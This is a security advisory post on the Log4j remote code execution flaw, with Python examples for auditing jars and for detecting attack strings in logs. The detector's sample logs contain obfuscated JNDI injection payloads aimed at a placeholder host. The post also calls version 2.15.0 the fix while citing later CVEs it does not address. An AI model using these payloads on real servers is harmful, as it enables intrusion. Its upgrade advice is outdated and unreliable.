On December 9, 2021, the Apache Software Foundation disclosed that the Log4j logging library contains a remote code execution vulnerability (CVE-2021-44228, along with the related CVE-2021-45046 and CVE-2021-44832). It was assigned a severity score of 10, the highest possible risk score. Log4j is a ubiquitous piece of software used to record activity in a wide range of systems, including consumer-facing products and services. This vulnerability poses a severe risk to millions of systems, from consumer products to enterprise software and web applications.
Figure: example representation of an exfiltration attack scenario.
Exploitation attempts and testing remained high through the last weeks of December and show no signs of slowing down. Security companies have observed many existing attackers adding exploits for these vulnerabilities to their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks. Organizations may not realize their environments may already be compromised, so it is recommended that customers perform additional review of devices where vulnerable installations are discovered. At this juncture, customers should assume broad availability of exploit code and scanning capabilities to be a real and present danger to their environments. Because so many software products and services are affected, and given the pace of updates, remediation is expected to have a long tail, requiring ongoing, sustained vigilance.
When vulnerabilities are discovered and exploited, they risk loss or breach of personal information, financial loss, and other irreversible harms. The duty to take reasonable steps to mitigate known software vulnerabilities implicates laws including, among others, the Federal Trade Commission Act and the Gramm-Leach-Bliley Act. It is critical that companies and their vendors relying on Log4j act now to reduce the likelihood of harm to consumers and to avoid FTC legal action.
What to do next?
Many software vendors have published patches or version upgrades to specifically address the affected software/vulnerability. Even if the affected software does not have a remediation released yet, there are other ways to manually prevent the vulnerability from being exploited.
Here are some actions you can take:
Upgrade – Version 2.15.0 of Log4j was recently released in response to the vulnerability and contains a fix, so the best course of action is to upgrade vulnerable devices to version 2.15.0 immediately. If vendors have mitigation measures ready, work with them to ensure you are taking a coordinated approach to incident response.
If you are unable to patch, there are manual ways you can protect your environment:
Change parameters – If your version is 2.10 or above, you can add the JVM argument -Dlog4j2.formatMsgNoLookups=true, which sets the system property log4j2.formatMsgNoLookups to true.
If you are running an older version, from 2.0-beta9 to 2.10.0, the immediate fix is to remove the JndiLookup class from the classpath.
Note that these manual workarounds may have side effects on applications that depend on Log4j's lookup behavior. The best solution is to work with your vendor for a certified patch.
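The version checks and the classpath workaround above can be turned into a repeatable inventory step. The script below is an added example, not code from the original post or from the Log4j project: it reads each jar's Implementation-Version, applies the decision tree in the post (below 2.0-beta9 not affected, 2.0-beta9 to 2.10.0 remove JndiLookup, 2.10 and above the formatMsgNoLookups property or removal, 2.15.0 fixed), and removes the JndiLookup.class entry by rewriting the jar, which is what the `zip -q -d` command does. The jars it operates on are constructed stand-ins with empty class bodies; `build_demo_jar` and `run_demo` exist only to exercise the logic offline.

```python
"""Inspect Log4j 2 jars and apply the post's mitigation decision tree.

Added example; not code from the original post or from the Log4j project.
The jars built here are CONSTRUCTED: only the manifest version and entry names
resemble log4j-core, and class bodies are empty placeholders.
"""
import io
import os
import re
import tempfile
import zipfile

# Entry the post says to remove for versions 2.0-beta9 through 2.10.0.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def parse_version(text):
    """'2.14.1' -> (2, 14, 1, 1); '2.0-beta9' -> (2, 0, 0, 0, 'beta', 9).
    The fourth element sorts a pre-release below its final release."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-([A-Za-z]+)(\d+))?", text)
    if not m:
        return None
    base = (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))
    if m.group(4):
        return base + (0, m.group(4).lower(), int(m.group(5)))
    return base + (1,)


MIN_AFFECTED = parse_version("2.0-beta9")  # start of the affected range in the post
PROPERTY_MIN = parse_version("2.10.0")     # formatMsgNoLookups is available from here
FIXED = parse_version("2.15.0")            # the fixed release named in the post


def read_version(zf, path):
    """Prefer the manifest's Implementation-Version; fall back to the filename."""
    if "META-INF/MANIFEST.MF" in zf.namelist():
        text = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
        m = re.search(r"^Implementation-Version:\s*(\S+)", text, re.M)
        if m:
            return m.group(1)
    m = re.search(r"log4j-core-(.+)\.jar$", os.path.basename(path))
    return m.group(1) if m else None


def assess_jar(path):
    """Classify one jar and name the action the post recommends for it."""
    with zipfile.ZipFile(path) as zf:
        has_jndi = JNDI_CLASS in zf.namelist()
        version = read_version(zf, path)
    v = parse_version(version) if version else None
    if v is None:
        status, action = "unknown", "version not found; check with the vendor"
    elif v >= FIXED:
        status, action = "fixed", "at or above 2.15.0, the fixed release named in the post"
    elif v < MIN_AFFECTED:
        status, action = "not-affected", "below 2.0-beta9, outside the affected range"
    elif not has_jndi:
        status, action = "mitigated", "JndiLookup.class already removed from the jar"
    elif v >= PROPERTY_MIN:
        status, action = "vulnerable", ("start the JVM with -Dlog4j2.formatMsgNoLookups=true "
                                        "or remove JndiLookup.class")
    else:
        status, action = "vulnerable", "remove JndiLookup.class (no property option below 2.10)"
    return {"path": path, "version": version, "has_jndi": has_jndi,
            "status": status, "action": action}


def remove_jndi_lookup(path):
    """Rewrite the jar without JndiLookup.class; same result as
    `zip -q -d <jar> org/apache/logging/log4j/core/lookup/JndiLookup.class`.
    Returns True if the entry was present and removed."""
    buf = io.BytesIO()
    with zipfile.ZipFile(path) as src:
        if JNDI_CLASS not in src.namelist():
            return False
        with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as dst:
            for item in src.infolist():
                if item.filename != JNDI_CLASS:
                    dst.writestr(item, src.read(item.filename))
    tmp = path + ".tmp"
    with open(tmp, "wb") as f:
        f.write(buf.getvalue())
    os.replace(tmp, path)  # atomic swap: a crash never leaves a half-written jar
    return True


def build_demo_jar(directory, version, include_jndi=True):
    """CONSTRUCTED stand-in for log4j-core-<version>.jar (empty class bodies)."""
    path = os.path.join(directory, f"log4j-core-{version}.jar")
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"")
        if include_jndi:
            zf.writestr(JNDI_CLASS, b"")
    return path


def run_demo():
    """Assess constructed jars, then apply the classpath workaround to one of them."""
    out = {}
    with tempfile.TemporaryDirectory() as d:
        paths = {v: build_demo_jar(d, v) for v in ("2.0-beta8", "2.0-beta9", "2.14.1", "2.15.0")}
        out["before"] = {v: assess_jar(p)["status"] for v, p in paths.items()}
        out["action_2_14_1"] = assess_jar(paths["2.14.1"])["action"]
        out["action_2_0_beta9"] = assess_jar(paths["2.0-beta9"])["action"]
        out["removed"] = remove_jndi_lookup(paths["2.14.1"])
        out["after"] = assess_jar(paths["2.14.1"])["status"]
        out["removed_again"] = remove_jndi_lookup(paths["2.14.1"])
    return out


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

Against a real estate, point `assess_jar` at every log4j-core jar found on disk (including jars nested inside WAR and EAR archives, which this example does not unpack), and treat a "vulnerable" result as the trigger for the vendor conversation the post recommends; the removal path is the stopgap for jars that cannot be upgraded yet.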
Firewall – Another way to reduce your exposure is to update your next-generation firewall, web application firewall (WAF), and web proxy rules to block potentially dangerous requests. Unfortunately, there are many ways to obfuscate the attack strings, so there is no 100% foolproof way to detect attacks. The other options above are more reliable at blocking exploitation, so be aware that any filter you put in place could potentially be bypassed. Check with your firewall vendor for the latest rule sets.
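The caveat above is easy to see in code. The following detector is an added example, not code from the original post and not a vendor rule set: it runs a naive literal match and a normalizing match side by side over constructed access-log lines. Because Log4j resolves nested lookups such as `${lower:j}` before acting, and because a WAF may see the request URL-encoded, the normalizing detector decodes and collapses those forms before looking for a `${jndi:` lookup. The log lines and the `.example` hostname are constructed for this demonstration.

```python
"""Flag Log4j lookup strings in web request logs after normalization.

Added example; not code from the original post and not a vendor rule set.
The sample log lines are CONSTRUCTED. A literal match on "${jndi:" misses
URL-encoded requests and nested lookups that Log4j resolves before acting,
so the detector undoes those first. It remains a filter that can be bypassed.
"""
import re
from urllib.parse import unquote

# Nested lookups that collapse to a literal when Log4j resolves them.
_SUBS = [
    (re.compile(r"\$\{lower:([^{}]*)\}", re.I), lambda m: m.group(1).lower()),
    (re.compile(r"\$\{upper:([^{}]*)\}", re.I), lambda m: m.group(1).upper()),
    (re.compile(r"\$\{[^{}]*?:-([^{}]*)\}"), lambda m: m.group(1)),  # ${name:-default}
]
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)", re.I)

SAMPLE_LOGS = [  # constructed Apache-style access log lines
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://lookup-host.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://lookup-host.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Flookup-host.example%2Fa%7D HTTP/1.1" 400 0 "-" "curl/7.68.0"',
    '10.0.0.7 - - [10/Dec/2021:12:00:05 +0000] "GET /report?total=${amount} HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
]


def normalize(text, max_rounds=10):
    """Decode URL-encoding, then resolve nested lookups innermost-first until
    the text stops changing (bounded, so hostile input cannot loop forever)."""
    text = unquote(text)
    for _ in range(max_rounds):
        new = text
        for pattern, repl in _SUBS:
            new = pattern.sub(repl, new)
        if new == text:
            break
        text = new
    return text


def naive_match(line):
    """What a first-cut WAF rule does: look for the literal string."""
    return "${jndi:" in line


def detect(line):
    """Return the JNDI scheme (ldap, rmi, dns, ...) found after normalization, or None."""
    m = _JNDI.search(normalize(line))
    return m.group(1).lower() if m else None


def scan(lines=SAMPLE_LOGS):
    """Compare the naive rule with the normalizing detector over a batch of lines."""
    return {
        "naive": [i for i, line in enumerate(lines) if naive_match(line)],
        "normalized": [(i, detect(line)) for i, line in enumerate(lines) if detect(line)],
    }


if __name__ == "__main__":
    for key, hits in scan().items():
        print(f"{key}: {hits}")
```

The naive rule catches only the plain line; the normalizing detector also catches the nested and URL-encoded forms while leaving the ordinary `${amount}` template alone. It still only handles the lookup types it knows about, which is exactly why the post puts filtering behind patching and the JVM workarounds rather than in front of them.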
In conclusion, to ensure your data and systems are protected, check with your vendors to confirm this vulnerability does not exist within your environment or the applications you use. If it is found, take immediate action to patch the vulnerable systems identified. Vulnerabilities will constantly be identified and exposed, so ensure you have proactive measures in place and ‘layers’ of security to protect your critical business systems and especially your customer data.
If you are a PCS Managed Service customer, proactive scanning of your network systems is being performed to identify any instances of this vulnerability.